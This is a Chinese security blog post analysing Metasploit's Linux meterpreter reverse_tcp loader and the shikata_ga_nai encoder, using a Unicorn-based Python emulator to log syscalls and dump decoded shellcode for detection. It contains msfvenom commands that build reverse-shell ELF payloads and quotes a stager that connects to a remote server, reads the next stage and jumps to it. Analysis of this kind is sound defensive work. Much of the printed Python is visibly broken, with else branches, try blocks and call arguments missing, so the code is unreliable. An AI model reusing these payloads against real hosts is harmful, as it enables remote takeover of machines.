杀软的无奈-metasploit的shellcode loader分析(三)



发布时间 : 2021-06-15 10:00:22



本文主要是通过编写一些自动化的工具来分析metepreter生成的linux平台的shellcode loader,以及解释一些常用的编码器的工作过程。

本文使用的工具是 unicorn,官方版本没有执行SMC代码的能力(已经在修了),推荐暂时使用个人patch版本https://github.com/wonderkun/unicorn


无编码器的metepreter shellcode loader


msfvenom  -p  linux/x64/meterpreter/reverse_tcp  LHOST= LPORT=4444  -f elf > tese.elf



0x01 加载ELF文件


class ELF(object):

    def __init__(self,path):
        self.path = path
        self.fd = open(self.path,"rb") 

    def delete(self):
        # 需要手工调用,否则会产生文件占用
        if self.fd:

    def getFileHeader(self):
        elfhdr = {}
        #define EI_NIDENT       16

        typedef struct {
                unsigned char   e_ident[EI_NIDENT]; 
                Elf32_Half      e_type;
                Elf32_Half      e_machine;
                Elf32_Word      e_version;
                Elf32_Addr      e_entry;
                Elf32_Off       e_phoff;
                Elf32_Off       e_shoff;
                Elf32_Word      e_flags;
                Elf32_Half      e_ehsize;
                Elf32_Half      e_phentsize;
                Elf32_Half      e_phnum;
                Elf32_Half      e_shentsize;
                Elf32_Half      e_shnum;
                Elf32_Half      e_shstrndx;
        } Elf32_Ehdr;

        typedef struct {
                unsigned char   e_ident[EI_NIDENT]; 
                Elf64_Half      e_type;
                Elf64_Half      e_machine;
                Elf64_Word      e_version;
                Elf64_Addr      e_entry;
                Elf64_Off       e_phoff;
                Elf64_Off       e_shoff;
                Elf64_Word      e_flags;
                Elf64_Half      e_ehsize;
                Elf64_Half      e_phentsize;
                Elf64_Half      e_phnum;
                Elf64_Half      e_shentsize;
                Elf64_Half      e_shnum;
                Elf64_Half      e_shstrndx;
        } Elf64_Ehdr;

        elfident = self.fd.read(16)
        if len(elfident) !=16:
            return {}

        # print( [ ord(i) for i in elfident] )

        magic = [ ord(i) for i in elfident]

        if magic[4] == 1:
            # ELF 32
            packStr = "<2H5I6H"
            elfhdr["mode"] = 32

        elif magic[4] == 2:
            # ELF 64
            packStr = "<2HI3QI6H"
            elfhdr["mode"] = 64
            # Data
            return {}
        temp = self.fd.read(struct.calcsize( packStr ))
        temp = struct.unpack(packStr,temp)

        elfhdr['magic'] = magic
        elfhdr['e_type']= temp[0]
        elfhdr['e_machine'] = temp[1]
        elfhdr['e_version'] = temp[2]
        elfhdr['e_entry'] = temp[3]
        elfhdr['e_phoff'] = temp[4]
        elfhdr['e_shoff'] = temp[5]
        elfhdr['e_flags'] = temp[6]
        elfhdr['e_ehsize'] = temp[7]
        elfhdr['e_phentsize'] = temp[8]
        elfhdr['e_phnum'] = temp[9]
        elfhdr['e_shentsize'] = temp[10]
        elfhdr['e_shnum'] = temp[11]
        elfhdr['e_shstrndx'] = temp[12]
        return elfhdr

    def hasNoSectionInfo(self,elfhdr ):

        if not elfhdr:
            return False
        if elfhdr["e_shoff"] == 0 and \
            elfhdr["e_shnum"] == 0:
            return True
        return False

    # print(elfhdr["e_shoff"])
    # print( elfhdr["e_shnum"] )
    # print( elfhdr["e_shentsize"] )

    def readProgramHeader(self,elfhdr):
        headerSize = elfhdr["e_ehsize"]
            typedef struct {
                Elf32_Word      p_type;
                Elf32_Off       p_offset;
                Elf32_Addr      p_vaddr;
                Elf32_Addr      p_paddr;
                Elf32_Word      p_filesz;
                Elf32_Word      p_memsz;
                Elf32_Word      p_flags;
                Elf32_Word      p_align;
            } Elf32_Phdr;

            typedef struct {
                Elf64_Word      p_type;
                Elf64_Word      p_flags;
                Elf64_Off       p_offset;
                Elf64_Addr      p_vaddr;
                Elf64_Addr      p_paddr;
                Elf64_Xword     p_filesz;
                Elf64_Xword     p_memsz;
                Elf64_Xword     p_align;
            } Elf64_Phdr;

        if elfhdr["mode"] == 32:
            packStr = "<8I"
        elif elfhdr["mode"] == 64:
            packStr = "<2I6Q"

        phentsize = elfhdr["e_phentsize"]
        phnum = elfhdr["e_phnum"]

        if struct.calcsize( packStr ) != phentsize :
            return []

        assert( phnum >= 1 )

        phHeaders = []
        for i in range(phnum):
            # 循环读取所有的段表
            phHeader = {}
            temp = self.fd.read(struct.calcsize( packStr ))
            if struct.calcsize( packStr ) != len(temp):

            temp = struct.unpack(packStr,temp)

            if elfhdr["mode"] == 32:
                phHeader["p_type"] = temp[0]
                phHeader["p_offset"] = temp[1]
                phHeader["p_vaddr"] = temp[2]
                phHeader["p_paddr"] = temp[3]
                phHeader["p_filesz"] = temp[4]
                phHeader["p_memsz"] = temp[5]
                phHeader["p_flags"] = temp[6]
                phHeader["p_align"] = temp[7]

            elif elfhdr["mode"] == 64:
                phHeader["p_type"] = temp[0]
                phHeader["p_flags"] = temp[1]
                phHeader["p_offset"] = temp[2]
                phHeader["p_vaddr"] = temp[3]
                phHeader["p_paddr"] = temp[4]
                phHeader["p_filesz"] = temp[5]
                phHeader["p_memsz"] = temp[6]
                phHeader["p_align"] = temp[7]
            phHeaders.append( phHeader )

        return phHeaders

    def getFirstCode(self,elfhdr,phHeaders):
        # 读取第一个 包含入口地址 并且可加载,可执行的段的数据
        entryPoint = elfhdr["e_entry"]
        PT_LOAD = 1

        PF_X = 0x1 
        PF_W = 0x2
        PF_R = 0x4

        firstPh = None
        # print(phHeaders)

        for  phHeader in phHeaders:
            if not ( entryPoint >= phHeader["p_vaddr"] and entryPoint < (phHeader["p_vaddr"]+phHeader["p_filesz"]) ):

            if phHeader["p_type"] == PT_LOAD and\
                (phHeader["p_flags"] & (PF_X)):

                # rwx
                firstPh = phHeader

        # print(firstPh)

        if firstPh:
            fileOff = entryPoint - firstPh["p_vaddr"] + phHeader["p_offset"]
            size = phHeader["p_filesz"] - ( entryPoint - firstPh["p_vaddr"] )

            if fileOff < 0  or size < 0 :
                # invalid entry point
                return None,None

            imageBase = firstPh["p_vaddr"]

            return imageBase,self.fd.read( size )

        return None,None


class SimpleEngine:
    def __init__(self, mode):
        if mode == 32:
            cur_mode = CS_MODE_32
        elif mode == 64:
            cur_mode = CS_MODE_64
            cur_mode = CS_MODE_16

        self.capmd = Cs(CS_ARCH_X86, cur_mode)

    def disas_single(self, data, addr):
        for i in self.capmd.disasm(data, addr):
            print("  0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

    def disas_all(self, data, addr):
        for i in self.capmd.disasm(data, addr):
            print("  0x%x:\t%s\t%s" % (i.address, i.mnemonic, i.op_str))

def hook_code(uc, addr, size, user_data):
    mem = uc.mem_read(addr, size)
    uc.disasm.disas_single(mem, addr)

    # if debug:
    #     print("r10:{}".format( hex(uc.reg_read( UC_X86_REG_R10 ) ) ))
    #     print("rcx:{}".format( uc.reg_read( UC_X86_REG_RCX ) ) )
    #     print("rdx:{}".format( uc.reg_read( UC_X86_REG_RDX ) ) )
    return True

def main(bin_code,mode,imageBase,entryPoint,max_instruction=0):
    global write_bounds
    global debug

    debug = True

    tags = []
    write_bounds = [None, None]

    disas_engine = SimpleEngine(mode)

    if mode == 32:
        cur_mode = UC_MODE_32
    elif mode == 64:
        cur_mode = UC_MODE_64
        cur_mode = UC_MODE_16

    PAGE_SIZE = 6 * 1024 * 1024
    START_RIP = entryPoint

    # setup engine and write the memory there.
    emu = Uc(UC_ARCH_X86, cur_mode)
    emu.disasm = disas_engine # python is silly but it works.

    # print( hex(imageBase),PAGE_SIZE,mode )

    emu.mem_map(imageBase, PAGE_SIZE)
    # write machine code to be emulated to memory
    emu.mem_write(START_RIP, bin_code)

    # write a INT 0x3 near the end of the code blob to make sure emulation ends
    emu.mem_write(START_RIP + len(bin_code) + 0xff, b"\xcc\xcc\xcc\xcc")

    if debug:
        # emu.hook_add(UC_HOOK_MEM_READ, hook_mem_read)
        emu.hook_add(UC_HOOK_CODE, hook_code)

    # arbitrary address for ESP.
    stackBase = imageBase + PAGE_SIZE - 1*1024 * 1024


    if max_instruction:
        end_addr = -1
        max_instruction = 0x1000
        end_addr = len(bin_code)

        emu.emu_start(START_RIP, end_addr, 0, int(max_instruction))
    # except UC_ERR_READ_UNMAPPED as e:
    #     # print("ERROR: %s" % e)
    #     pass
    except UcError as e:
        if e.errno != UC_ERR_READ_UNMAPPED:
            print("ERROR: %s" % e)
            if debug:
                print("rcx:{}".format( emu.reg_read( UC_X86_REG_RCX ) ) )
                print("rbp:{}".format( emu.reg_read( UC_X86_REG_RBP ) ) )

执行一下,就可以dump出来当前分支的所有代码,但是现在还并没有处理syscall,接下里需要添加syscall的hook,来dump syscall的参数来方便分析。

0x02 syscall 参数的处理

x86_64 的syscall调用的系统调用号、参数、和系统调用号可以参考文档 https://chromium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.md

接下里进行 syscall的hook,编写如下类:

class HookSyscall(object):

    def __init__(self):
        self.c2Server = None
        self.protectAddr = 0
        self.writeAddr = 0 
        self.addrLen = 0

        self.dupList = set() # dup2

    def ip2Str(self,num):
        s = []
        for i in range(4):
            s.append(str( num%256 ))
            num //= 256
        return '.'.join(s[::-1])

    def __call__(self,uc,user_data):
    # pass
        rax = uc.reg_read(UC_X86_REG_RAX)
        rdi = uc.reg_read(UC_X86_REG_RDI)
        rsi = uc.reg_read(UC_X86_REG_RSI)
        rdx = uc.reg_read(UC_X86_REG_RDX)
        r10 = uc.reg_read(UC_X86_REG_R10)
        r8 = uc.reg_read(UC_X86_REG_R8)
        r9 = uc.reg_read(UC_X86_REG_R9)

        if debug:
            print( "[*] rax:\t{},rdi:\t{},rsi:\t{},rdx:\t{},r10:\t{}".format(  
            ) )

        if rax == 0x09:
            # # syscall mmap
            # if debug:
            #     print("[-] mmap")
            PROT_EXEC = 0x04
            PROT_WRITE = 0x02

            if rdx & PROT_EXEC and rdx & PROT_WRITE:
                # 返回一个地址                    
                rip = uc.reg_read(UC_X86_REG_RIP)
                self.protectAddr =  (rip >> 12 << 12) + 4*0x1000
                self.addrLen = rsi

                if debug:
                    print("[-] mmap size: {},permit: {} , addr: {} ".format( rsi,rdx & 0b111,self.protectAddr ))



        if rax == 0x2b:
            if debug:
                print("[-] listen")


        if rax == 0x29:
            if debug:
                print("[-] socket")


        if rax == 0x21:
            if debug:
                print("[-] dup2 , {}->{}".format( rdi, rsi)) 
            self.dupList.add( rsi )

        if rax == 0x2a or rax == 0x31:
            if debug:
                print("[-] connect or bind!")
            sockaddr_in_addr = rsi

            sockaddr_in_str = ">2HI"        
            tmp = uc.mem_read(sockaddr_in_addr, struct.calcsize(sockaddr_in_str) )
            sockaddr_in = struct.unpack(sockaddr_in_str,tmp)
            # print(tmp)


            # print(sockaddr_in)

            port  = sockaddr_in[1]
            addr = self.ip2Str(sockaddr_in[2])

            if debug:
                print("[-] c2 Server {}:{}".format( addr,port ))
            self.c2Server = "{}:{}".format(addr,port)


        if rax == 0x00:
            print("[-] read")
            self.writeAddr = rsi


        # if rax ==


        return True


hookSyscall = HookSyscall()
emu.hook_add(UC_HOOK_INSN, hookSyscall, None, 1, 0, UC_X86_INS_SYSCALL)


0x40008d:     syscall
[*] rax:        0x9L,rdi:       0,rsi:  4096,rdx:       4103,r10:       34
[-] mmap size: 4096,permit: 7 , addr: 4210688 


0x4000a3:     syscall
[*] rax:        0x29L,rdi:      2,rsi:  1,rdx:  0,r10:  34
[-] socket


0x4000c0:     syscall
[*] rax:        0x2aL,rdi:      41,rsi: 9437168,rdx:    16,r10: 34
[-] connect or bind!
[-] c2 Server


0x4000f1:     syscall
[*] rax:        0x0L,rdi:       41,rsi: 4210688,rdx:    126,r10:        34
[-] read
0x4000f3:     test    rax, rax
0x4000f6:     js      0x4000e5
0x4000f8:     jmp     rsi


1. mmap 申请一块rwx权限的内存空间,地址为A 
2. socket  创建一个socket
3. connect 连接一个socket
4. read 读取远程数据写到A
5. jmp A 执行代码



metepreter 的二进制编码器都是使用SMC代码来实现恶意代码的隐藏,本文使用效果excellent的编码器 x86/shikata_ga_nai 进行示例,接下里的代码一定要使用我patch过的unicorn才能获得预期的效果。

msfvenom  -p  linux/x64/meterpreter/reverse_tcp  LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 1  -f elf > tese_encoder.elf



LOAD:000000000040007D                 fcmovb  st, st(2)
LOAD:000000000040007F                 fnstenv [rsp+var_C]
LOAD:0000000000400083                 pop     rbx


LOAD:0000000000400084                 sub     ecx, ecx
LOAD:0000000000400086                 mov     cl, 21h ; '!'
LOAD:0000000000400088                 sub     ebx, 0FFFFFFFCh
LOAD:000000000040008B                 xor     [rbx+10h], esi

经过测试,此编码器每次生成的密钥都不同,也就是这条指令mov esi, 0EF034529h,剩下的流程都是一样的,包括需要解密的长度,一直都是 mov cl, 21h


# 添加如下hook函数
emu.hook_add(UC_HOOK_MEM_WRITE, hook_smc_check)

write_bounds = [None, None]

def hook_smc_check(uc, access, address, size, value, user_data):
    SMC_BOUND = 0x200
    rip = uc.reg_read(UC_X86_REG_RIP)

    # Just check if the write target addr is near EIP
    if abs(rip - address) < SMC_BOUND:
        if write_bounds[0] == None:
            write_bounds[0] = address
            write_bounds[1] = address
        elif address < write_bounds[0]:
            write_bounds[0] = address
        elif address > write_bounds[1]:
            write_bounds[1] = address

if write_bounds[0] != None:
  # print("Shellcode address ranges:")
  # print("   low:  0x%X" % write_bounds[0])
  # print("   high: 0x%X" % write_bounds[1])
  # print("")
  # print("Decoded shellcode:")
  mem = emu.mem_read(write_bounds[0], (write_bounds[1] - write_bounds[0]))
  emu.disasm.disas_all(mem, write_bounds[0])

这样就会完整的dump修改之后的代码,这个修改后的代码和之前生成的代码是相同的。x86系统调用的是int 80中断,其实原理都是一样的, 所以不再赘述。到这里基本的原理和代码都已经讲完了,随便自己再完善一下就可以实现metasploit生成的后门的模拟执行检测了。




msfvenom 文件的路径在 metasploit-framework/embedded/framework/msfvenom,跟踪这个文件的中的执行流程,当 payload 为 linux/x86/meterpreter/reverse_tcp 会执行到文件 metasploit-framework/embedded/framework/lib/msf/core/payload/linux/reverse_tcp_x86.rb

  • 函数 asm_reverse_tcp 就是生成 shellcode 主函数

  def asm_reverse_tcp(opts={})
    # TODO: reliability is coming
    retry_count  = opts[:retry_count]
    encoded_port = "0x%.8x" % [opts[:port].to_i, 2].pack("vn").unpack("N").first
    encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"").unpack("V").first
    seconds = (opts[:sleep_seconds] || 5.0)
    sleep_seconds = seconds.to_i
    sleep_nanoseconds = (seconds % 1 * 1000000000).to_i

    mprotect_flags = 0b111 # PROT_READ | PROT_WRITE | PROT_EXEC


    if respond_to?(:generate_intermediate_stage)
      pay_mod = framework.payloads.create(self.refname)
      puts "datastore:",datastore,"\n"

      payload = pay_mod.generate_stage(datastore.to_h)

      # puts "payload:#{payload.split(//).each {|e|;print (e.unpack('H*').to_s)}}"

      read_length = pay_mod.generate_intermediate_stage(pay_mod.generate_stage(datastore.to_h)).size
    elsif !module_info['Stage']['Payload'].empty?
      read_length = module_info['Stage']['Payload'].size
      # If we don't know, at least use small instructions
      read_length = 0x0c00 + mprotect_flags

此代码只是为了计算下一个控制阶段所要使用的 shellcode 的长度,在这里生成的shellcode不会在本次loader阶段下发。

接着就是 shellcode :

    asm = %Q^
        push #{retry_count}        ; retry counter
        pop esi
        xor ebx, ebx
        mul ebx
        push ebx
        inc ebx
        push ebx
        push 0x2
        mov al, 0x66
        mov ecx, esp
        int 0x80                   ; sys_socketcall (socket())
        xchg eax, edi              ; store the socket in edi

        pop ebx                    ; set ebx back to zero
        push #{encoded_host}
        push #{encoded_port}
        mov ecx, esp

        push 0x66
        pop eax
        push eax
        push ecx
        push edi
        mov ecx, esp
        inc ebx
        int 0x80                   ; sys_socketcall (connect())
        test eax, eax
        jns mprotect

        dec esi
        jz failed
        push 0xa2
        pop eax
        push 0x#{sleep_nanoseconds.to_s(16)}
        push 0x#{sleep_seconds.to_s(16)}
        mov ebx, esp
        xor ecx, ecx
        int 0x80                   ; sys_nanosleep
        test eax, eax
        jns create_socket
        jmp failed

    asm << asm_send_uuid if include_send_uuid

    asm << %Q^
        mov dl, 0x#{mprotect_flags.to_s(16)}
        mov ecx, 0x1000
        mov ebx, esp
        shr ebx, 0xc
        shl ebx, 0xc
        mov al, 0x7d
        int 0x80                  ; sys_mprotect
        test eax, eax
        js failed

        pop ebx
        mov ecx, esp
        mov #{read_reg},  0x#{read_length.to_s(16)}
        mov al, 0x3
        int 0x80                  ; sys_read (recv())
        test eax, eax
        js failed
        jmp ecx

        mov eax, 0x1
        mov ebx, 0x1              ; set exit status to 1
        int 0x80                  ; sys_exit




上一步是生成 payload, 接下来这一步就是利用 encoder 对 payload 进行编码,

encoder x86/shikata_ga_nai 的代码路径是 metasploit-framework/embedded/framework/modules/encoders/x86/shikata_ga_nai.rb:

函数 decoder_stub 是关键,主要作用是生成 shellcode 解码的头部:

  def decoder_stub(state)

    # If the decoder stub has not already been generated for this state, do
    # it now.  The decoder stub method may be called more than once.
    if (state.decoder_stub == nil)
      # Sanity check that saved_registers doesn't overlap with modified_registers
      if (modified_registers & saved_registers).length > 0
        raise BadGenerateError

      # Shikata will only cut off the last 1-4 bytes of it's own end
      # depending on the alignment of the original buffer
      cutoff = 4 - (state.buf.length & 3)
      block = generate_shikata_block(state, state.buf.length + cutoff, cutoff) || (raise BadGenerateError)
      # Set the state specific key offset to wherever the XORK ended up.
      state.decoder_key_offset = block.index('XORK')

      # Take the last 1-4 bytes of shikata and prepend them to the buffer
      # that is going to be encoded to make it align on a 4-byte boundary.
      state.buf = block.slice!(block.length - cutoff, cutoff) + state.buf
      # Cache this decoder stub.  The reason we cache the decoder stub is
      # because we need to ensure that the same stub is returned every time
      # for a given encoder state.
      state.decoder_stub = block


先不看 generate_shikata_block 函数的实现,先打印一下 block 内容和最后生成的 elf 文件:

block: "\xDB\xCB\xBFXORK\xD9t$\xF4]3\xC9\xB1\x1F1}\x1A\x83\xED\xFC\x03}\x16\xE2\xF5"

可以看到 block 的代码就是 fpu 和 getPC 功能的代码,其中 XORK 就是最后的解密密钥,这个值是动态变化的,保证每次都不相同。

但是这样的一个解密的头部,其实还是存在一个很固定的形式的,来看 generate_shikata_block 的代码:

    count_reg = Rex::Poly::LogicalRegister::X86.new('count', 'ecx')
    addr_reg  = Rex::Poly::LogicalRegister::X86.new('addr')
    key_reg = nil

    if state.context_encoding
      key_reg = Rex::Poly::LogicalRegister::X86.new('key', 'eax')
      key_reg = Rex::Poly::LogicalRegister::X86.new('key')

    # Declare individual blocks
    endb = Rex::Poly::SymbolicBlock::End.new

    # Clear the counter register
    clear_register = Rex::Poly::LogicalBlock.new('clear_register',
      "\x31\xc9",  # xor ecx,ecx
      "\x29\xc9",  # sub ecx,ecx
      "\x33\xc9",  # xor ecx,ecx
      "\x2b\xc9")  # sub ecx,ecx

ecx 中存储是接下来要进行解密的长度,所以需要先清空 ecx,清空的指令是从这几条指令中任选一条。

    if (length <= 255)
      init_counter.add_perm("\xb1" + [ length ].pack('C'))
    elsif (length <= 65536)
      init_counter.add_perm("\x66\xb9" + [ length ].pack('v'))
      init_counter.add_perm("\xb9" + [ length ].pack('V'))

    # Key initialization block
    init_key = nil

    # If using context encoding, we use a mov reg, [addr]
    if state.context_encoding
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xa1 + b.regnum_of(key_reg)).chr + 'XORK'})
    # Otherwise, we do a direct mov reg, val
      init_key = Rex::Poly::LogicalBlock.new('init_key',
        Proc.new { |b| (0xb8 + b.regnum_of(key_reg)).chr + 'XORK'})

    xor  = Proc.new { |b| "\x31" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }
    add  = Proc.new { |b| "\x03" + (0x40 + b.regnum_of(addr_reg) + (8 * b.regnum_of(key_reg))).chr }

    sub4 = Proc.new { |b| sub_immediate(b.regnum_of(addr_reg), -4) }
    add4 = Proc.new { |b| add_immediate(b.regnum_of(addr_reg), 4) }


LOAD:08048062 B1 1F                                   mov     cl, 1Fh
LOAD:08048064 31 7D 1A                                xor     [ebp+1Ah], edi
LOAD:08048067 83 ED FC                                sub     ebp, 0FFFFFFFCh
LOAD:0804806A 03 7D 16                                add     edi, [ebp+16h]
    fpu = Rex::Poly::LogicalBlock.new('fpu',

    fnstenv = Rex::Poly::LogicalBlock.new('fnstenv',

    # Get EIP off the stack
    getpc = Rex::Poly::LogicalBlock.new('getpc',
    Proc.new { |b| (0x58 + b.regnum_of(addr_reg)).chr })

生成 fpu 操作指令和 fnstenv 指令,来getpc。

可以看到 \xd9\x74\x24\xf4 是一个硬编码,这就是一个特征。同时fpu 指令也是有限的:

  def fpu_instructions
    puts "-----sub_immediate : fpu_instructions----------------"
    fpus = []

    0xe8.upto(0xee) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xcf) { |x| fpus << "\xd9" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xda" + x.chr }
    0xc0.upto(0xdf) { |x| fpus << "\xdb" + x.chr }
    0xc0.upto(0xc7) { |x| fpus << "\xdd" + x.chr }

    fpus << "\xd9\xd0"
    fpus << "\xd9\xe1"
    fpus << "\xd9\xf6"
    fpus << "\xd9\xf7"
    fpus << "\xd9\xe5"

    # This FPU instruction seems to fail consistently on Linux
    #fpus << "\xdb\xe1"


所有可能的指令选择都在 fpus 这个数组中了。剩下的部分就不再说了。


经过上述的分析,可以发现 x86/shikata_ga_nai 编码器的特征也是比较固定的,所以针对这个特征写出专有的静态查杀规则也是比较简单的。本文就不再写了,有兴趣的自己写一个把。


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